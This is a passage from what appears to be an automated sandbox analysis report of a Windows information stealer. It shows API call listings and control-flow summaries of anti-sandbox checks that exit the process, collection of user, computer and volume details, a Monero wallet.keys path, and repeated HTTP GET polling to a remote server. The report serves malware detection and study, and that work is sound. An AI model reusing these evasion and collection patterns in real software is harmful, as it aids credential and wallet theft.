                        • GetProcAddress.KERNEL32(6E330000,00887A10), ref: 00C5A6CD
                        • GetProcAddress.KERNEL32(6E330000,0089F0B0), ref: 00C5A6E5
                        • GetProcAddress.KERNEL32(6E330000,0089F1A0), ref: 00C5A6FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: HttpQueryInfoA$InternetSetOptionA
                        • API String ID: 2238633743-1775429166
                        • Opcode ID: ef27e421e54663214de7e9d7538c81bbb6db14eec4e277ff38f6de8132ece91a
                        • Instruction ID: ced994902c8498f99a8efb9be2a333ac2f28b0672ad915bbafdc84c7c0171f04
                        • Opcode Fuzzy Hash: ef27e421e54663214de7e9d7538c81bbb6db14eec4e277ff38f6de8132ece91a
                        • Instruction Fuzzy Hash: BF623EB5500600AFF348DFAAED8895637F9F74C70171C853BA60DE3234D63A945AEB22

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1033 c46280-c4630b call c5a7a0 call c447b0 call c5a740 InternetOpenA StrCmpCA 1040 c46314-c46318 1033->1040 1041 c4630d 1033->1041 1042 c4631e-c46342 InternetConnectA 1040->1042 1043 c46509-c46525 call c5a7a0 call c5a800 * 2 1040->1043 1041->1040 1044 c464ff-c46503 InternetCloseHandle 1042->1044 1045 c46348-c4634c 1042->1045 1061 c46528-c4652d 1043->1061 1044->1043 1047 c4634e-c46358 1045->1047 1048 c4635a 1045->1048 1051 c46364-c46392 HttpOpenRequestA 1047->1051 1048->1051 1053 c464f5-c464f9 InternetCloseHandle 1051->1053 1054 c46398-c4639c 1051->1054 1053->1044 1056 c463c5-c46405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 c4639e-c463bf InternetSetOptionA 1054->1057 1059 c46407-c46427 call c5a740 call c5a800 * 2 1056->1059 1060 c4642c-c4644b call c58940 1056->1060 1057->1056 1059->1061 1067 c4644d-c46454 1060->1067 1068 c464c9-c464e9 call c5a740 call c5a800 * 2 1060->1068 1071 c46456-c46480 InternetReadFile 1067->1071 1072 c464c7-c464ef InternetCloseHandle 1067->1072 1068->1061 1076 c46482-c46489 1071->1076 1077 c4648b 1071->1077 1072->1053 1076->1077 1080 c4648d-c464c5 call c5a9b0 call c5a8a0 call c5a800 1076->1080 1077->1072 1080->1071
                        APIs
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                          • Part of subcall function 00C447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C44839
                          • Part of subcall function 00C447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C44849
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        • InternetOpenA.WININET(00C60DFE,00000001,00000000,00000000,00000000), ref: 00C462E1
                        • StrCmpCA.SHLWAPI(?,008A0610), ref: 00C46303
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C46335
                        • HttpOpenRequestA.WININET(00000000,GET,?,0089FCA0,00000000,00000000,00400100,00000000), ref: 00C46385
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C463BF
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C463D1
                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00C463FD
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C4646D
                        • InternetCloseHandle.WININET(00000000), ref: 00C464EF
                        • InternetCloseHandle.WININET(00000000), ref: 00C464F9
                        • InternetCloseHandle.WININET(00000000), ref: 00C46503
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID: ERROR$ERROR$GET
                        • API String ID: 3749127164-2509457195
                        • Opcode ID: 7479fe20c364f97fd262a44763f00c65637a71ea2795479b2c64dd0bc6695abc
                        • Instruction ID: 0f50684c529cc9927914b4652e0b9a816357883b8166b0cb662c01fba988624b
                        • Opcode Fuzzy Hash: 7479fe20c364f97fd262a44763f00c65637a71ea2795479b2c64dd0bc6695abc
                        • Instruction Fuzzy Hash: 4C717D75A00208AFEB24DFA1CC49BEE7774BB04701F108169F5096B1D4DBB46A89DF52

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1090 c55510-c55577 call c55ad0 call c5a820 * 3 call c5a740 * 4 1106 c5557c-c55583 1090->1106 1107 c55585-c555b6 call c5a820 call c5a7a0 call c41590 call c551f0 1106->1107 1108 c555d7-c5564c call c5a740 * 2 call c41590 call c552c0 call c5a8a0 call c5a800 call c5aad0 StrCmpCA 1106->1108 1123 c555bb-c555d2 call c5a8a0 call c5a800 1107->1123 1134 c55693-c556a9 call c5aad0 StrCmpCA 1108->1134 1138 c5564e-c5568e call c5a7a0 call c41590 call c551f0 call c5a8a0 call c5a800 1108->1138 1123->1134 1139 c557dc-c55844 call c5a8a0 call c5a820 * 2 call c41670 call c5a800 * 4 call c56560 call c41550 1134->1139 1140 c556af-c556b6 1134->1140 1138->1134 1271 c55ac3-c55ac6 1139->1271 1142 c556bc-c556c3 1140->1142 1143 c557da-c5585f call c5aad0 StrCmpCA 1140->1143 1146 c556c5-c55719 call c5a820 call c5a7a0 call c41590 call c551f0 call c5a8a0 call c5a800 1142->1146 1147 c5571e-c55793 call c5a740 * 2 call c41590 call c552c0 call c5a8a0 call c5a800 call c5aad0 StrCmpCA 1142->1147 1161 c55865-c5586c 1143->1161 1162 c55991-c559f9 call c5a8a0 call c5a820 * 2 call c41670 call c5a800 * 4 call c56560 call c41550 1143->1162 1146->1143 1147->1143 1250 c55795-c557d5 call c5a7a0 call c41590 call c551f0 call c5a8a0 call c5a800 1147->1250 1168 c55872-c55879 1161->1168 1169 c5598f-c55a14 call c5aad0 StrCmpCA 1161->1169 1162->1271 1175 c558d3-c55948 call c5a740 * 2 call c41590 call c552c0 call c5a8a0 call c5a800 call c5aad0 StrCmpCA 1168->1175 1176 c5587b-c558ce call c5a820 call c5a7a0 call c41590 call c551f0 call c5a8a0 call c5a800 1168->1176 1198 c55a16-c55a21 Sleep 1169->1198 1199 c55a28-c55a91 call c5a8a0 call c5a820 * 2 call c41670 call c5a800 * 4 call c56560 call c41550 1169->1199 1175->1169 1274 c5594a-c5598a call c5a7a0 call c41590 call c551f0 call c5a8a0 call c5a800 1175->1274 1176->1169 1198->1106 1199->1271 1250->1143 1274->1169
                        APIs
                          • Part of subcall function 00C5A820: lstrlen.KERNEL32(00C44F05,?,?,00C44F05,00C60DDE), ref: 00C5A82B
                          • Part of subcall function 00C5A820: lstrcpy.KERNEL32(00C60DDE,00000000), ref: 00C5A885
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C55644
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C556A1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C55857
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                          • Part of subcall function 00C551F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C55228
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C552C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C55318
                          • Part of subcall function 00C552C0: lstrlen.KERNEL32(00000000), ref: 00C5532F
                          • Part of subcall function 00C552C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00C55364
                          • Part of subcall function 00C552C0: lstrlen.KERNEL32(00000000), ref: 00C55383
                          • Part of subcall function 00C552C0: lstrlen.KERNEL32(00000000), ref: 00C553AE
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C5578B
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C55940
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C55A0C
                        • Sleep.KERNEL32(0000EA60), ref: 00C55A1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen$Sleep
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 507064821-2791005934
                        • Opcode ID: e986695314c55e7c2900d388c513eec30574f3605f94cc994e01864c2180e396
                        • Instruction ID: 897d2ddab0c05c3174c286184e50bd24ff33c8b070e78b1e6866476db54e92c5
                        • Opcode Fuzzy Hash: e986695314c55e7c2900d388c513eec30574f3605f94cc994e01864c2180e396
                        • Instruction Fuzzy Hash: 22E176759101049ADB14FBB2DC96AED7338BF54341F548228BD07620D1EF346B8DEBA6

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1301 c517a0-c517cd call c5aad0 StrCmpCA 1304 c517d7-c517f1 call c5aad0 1301->1304 1305 c517cf-c517d1 ExitProcess 1301->1305 1309 c517f4-c517f8 1304->1309 1310 c519c2-c519cd call c5a800 1309->1310 1311 c517fe-c51811 1309->1311 1312 c51817-c5181a 1311->1312 1313 c5199e-c519bd 1311->1313 1315 c51821-c51830 call c5a820 1312->1315 1316 c518ad-c518be StrCmpCA 1312->1316 1317 c518cf-c518e0 StrCmpCA 1312->1317 1318 c5198f-c51999 call c5a820 1312->1318 1319 c51849-c51858 call c5a820 1312->1319 1320 c51835-c51844 call c5a820 1312->1320 1321 c518f1-c51902 StrCmpCA 1312->1321 1322 c51951-c51962 StrCmpCA 1312->1322 1323 c51970-c51981 StrCmpCA 1312->1323 1324 c51913-c51924 StrCmpCA 1312->1324 1325 c51932-c51943 StrCmpCA 1312->1325 1326 c5185d-c5186e StrCmpCA 1312->1326 1327 c5187f-c51890 StrCmpCA 1312->1327 1313->1309 1315->1313 1329 c518c0-c518c3 1316->1329 1330 c518ca 1316->1330 1331 c518e2-c518e5 1317->1331 1332 c518ec 1317->1332 1318->1313 1319->1313 1320->1313 1333 c51904-c51907 1321->1333 1334 c5190e 1321->1334 1339 c51964-c51967 1322->1339 1340 c5196e 1322->1340 1342 c51983-c51986 1323->1342 1343 c5198d 1323->1343 1335 c51926-c51929 1324->1335 1336 c51930 1324->1336 1337 c51945-c51948 1325->1337 1338 c5194f 1325->1338 1348 c51870-c51873 1326->1348 1349 c5187a 1326->1349 1350 c51892-c5189c 1327->1350 1351 c5189e-c518a1 1327->1351 1329->1330 1330->1313 1331->1332 1332->1313 1333->1334 1334->1313 1335->1336 1336->1313 1337->1338 1338->1313 1339->1340 1340->1313 1342->1343 1343->1313 1348->1349 1349->1313 1352 c518a8 1350->1352 1351->1352 1352->1313
                        APIs
                        • StrCmpCA.SHLWAPI(00000000,block), ref: 00C517C5
                        • ExitProcess.KERNEL32 ref: 00C517D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: a08cf7772107246c31d94a2e5100037783b96e65e4b194047361c654e6a7431e
                        • Instruction ID: ec9328ea0d4c5e30a2f210b7e508fec60569b401fdd0a3c13a1c73aa5f015953
                        • Opcode Fuzzy Hash: a08cf7772107246c31d94a2e5100037783b96e65e4b194047361c654e6a7431e
                        • Instruction Fuzzy Hash: 175191B8A00209EFDB14DFA2C958BBE77B5BF44305F184159EC0677280D770EA89DB66

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1356 c57500-c5754a GetWindowsDirectoryA 1357 c57553-c575c7 GetVolumeInformationA call c58d00 * 3 1356->1357 1358 c5754c 1356->1358 1365 c575d8-c575df 1357->1365 1358->1357 1366 c575e1-c575fa call c58d00 1365->1366 1367 c575fc-c57617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 c57619-c57626 call c5a740 1367->1369 1370 c57628-c57658 wsprintfA call c5a740 1367->1370 1377 c5767e-c5768e 1369->1377 1370->1377
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00C57542
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C5757F
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C57603
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C5760A
                        • wsprintfA.USER32 ref: 00C57640
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\
                        • API String ID: 1544550907-3809124531
                        • Opcode ID: 2c9e08e94af8f96f64654a38b89f2be5aa2337b58e94854e002f2c00c34eea1b
                        • Instruction ID: 658903dd11696745c8c6f35e3719432829a7ae6b7f510ddbf36c5de16b9103b0
                        • Opcode Fuzzy Hash: 2c9e08e94af8f96f64654a38b89f2be5aa2337b58e94854e002f2c00c34eea1b
                        • Instruction Fuzzy Hash: 384184B5D04248AFDB10DF94DC45BDEBBB8AF08701F140199F90977280EB796A88CBA5

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,00894178), ref: 00C598A1
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,008940E8), ref: 00C598BA
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,00894130), ref: 00C598D2
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,008941C0), ref: 00C598EA
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,008941D8), ref: 00C59903
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,0089ADE8), ref: 00C5991B
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,008876D0), ref: 00C59933
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,008876F0), ref: 00C5994C
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,00893F98), ref: 00C59964
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,00893FE0), ref: 00C5997C
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,00894028), ref: 00C59995
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,00893FB0), ref: 00C599AD
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,00887650), ref: 00C599C5
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,00894058), ref: 00C599DE
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C411D0: ExitProcess.KERNEL32 ref: 00C41211
                          • Part of subcall function 00C41160: GetSystemInfo.KERNEL32(?), ref: 00C4116A
                          • Part of subcall function 00C41160: ExitProcess.KERNEL32 ref: 00C4117E
                          • Part of subcall function 00C41110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C4112B
                          • Part of subcall function 00C41110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00C41132
                          • Part of subcall function 00C41110: ExitProcess.KERNEL32 ref: 00C41143
                          • Part of subcall function 00C41220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C4123E
                          • Part of subcall function 00C41220: __aulldiv.LIBCMT ref: 00C41258
                          • Part of subcall function 00C41220: __aulldiv.LIBCMT ref: 00C41266
                          • Part of subcall function 00C41220: ExitProcess.KERNEL32 ref: 00C41294
                          • Part of subcall function 00C56770: GetUserDefaultLangID.KERNEL32 ref: 00C56774
                          • Part of subcall function 00C41190: ExitProcess.KERNEL32 ref: 00C411C6
                          • Part of subcall function 00C57850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C411B7), ref: 00C57880
                          • Part of subcall function 00C57850: RtlAllocateHeap.NTDLL(00000000), ref: 00C57887
                          • Part of subcall function 00C57850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C5789F
                          • Part of subcall function 00C578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C57910
                          • Part of subcall function 00C578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C57917
                          • Part of subcall function 00C578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C5792F
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0089ADD8,?,00C6110C,?,00000000,?,00C61110,?,00000000,00C60AEF), ref: 00C56ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C56AE8
                        • CloseHandle.KERNEL32(00000000), ref: 00C56AF9
                        • Sleep.KERNEL32(00001770), ref: 00C56B04
                        • CloseHandle.KERNEL32(?,00000000,?,0089ADD8,?,00C6110C,?,00000000,?,00C61110,?,00000000,00C60AEF), ref: 00C56B1A
                        • ExitProcess.KERNEL32 ref: 00C56B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 2525456742-0
                        • Opcode ID: 084cd1cc710ed6bf3a1e57903816a1c4be6800fd7823222c1f006a02ab53ad18
                        • Instruction ID: adb397ce9c8a4a9ab787971c3e1979085703c18e8892a38caeaa3eac417e72f1
                        • Opcode Fuzzy Hash: 084cd1cc710ed6bf3a1e57903816a1c4be6800fd7823222c1f006a02ab53ad18
                        • Instruction Fuzzy Hash: 1A314178900108ABDB04F7F2DC56BEE7778BF04342F444629F902A21C1EF705589E7AA

                        Control-flow Graph (graph image not rendered; node summary recovered from the page): basic blocks c41220-c4129d calling subcall c589b0, GlobalMemoryStatusEx, subcall c5da00 (twice) and ExitProcess
                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C4123E
                        • __aulldiv.LIBCMT ref: 00C41258
                        • __aulldiv.LIBCMT ref: 00C41266
                        • ExitProcess.KERNEL32 ref: 00C41294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 3404098578-2766056989
                        • Opcode ID: 7ea03a3726c173a4dc407aa9702d0fe952b54efb9cb1c22f6aa0c7e3df80d758
                        • Instruction ID: 296fecb2b29c3a9ef121fe8413ec7c1b57bd44f2bcb8d73ce77c1a2ce9071f8b
                        • Opcode Fuzzy Hash: 7ea03a3726c173a4dc407aa9702d0fe952b54efb9cb1c22f6aa0c7e3df80d758
                        • Instruction Fuzzy Hash: F20162B0D44308BAEB20DBD0CC49B9EB778BB04701F248055EB05F61C0D7B456859759

                        Control-flow Graph (graph image not rendered; node summary recovered from the page): basic blocks c56aba-c56b22 calling subcall c5aad0, OpenEventA, CreateEventA, CloseHandle, Sleep, subcalls c56920 and c55b10, and ExitProcess
                        APIs
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0089ADD8,?,00C6110C,?,00000000,?,00C61110,?,00000000,00C60AEF), ref: 00C56ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C56AE8
                        • CloseHandle.KERNEL32(00000000), ref: 00C56AF9
                        • Sleep.KERNEL32(00001770), ref: 00C56B04
                        • CloseHandle.KERNEL32(?,00000000,?,0089ADD8,?,00C6110C,?,00000000,?,00C61110,?,00000000,00C60AEF), ref: 00C56B1A
                        • ExitProcess.KERNEL32 ref: 00C56B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: 5314d6ff2c53516981a26510052eccd5fdcdb95a04286dbd51443b0f80e971ba
                        • Instruction ID: b579e1ca06b063cabb82cadd757059263e7ac4b3651b0b576100998a1fc0dc58
                        • Opcode Fuzzy Hash: 5314d6ff2c53516981a26510052eccd5fdcdb95a04286dbd51443b0f80e971ba
                        • Instruction Fuzzy Hash: 3CF03078940209AFF700ABA1DC0AB7D7674EB04702F544525FD17A2191DBB05588FA6E

                        Control-flow Graph

                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C44839
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00C44849
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
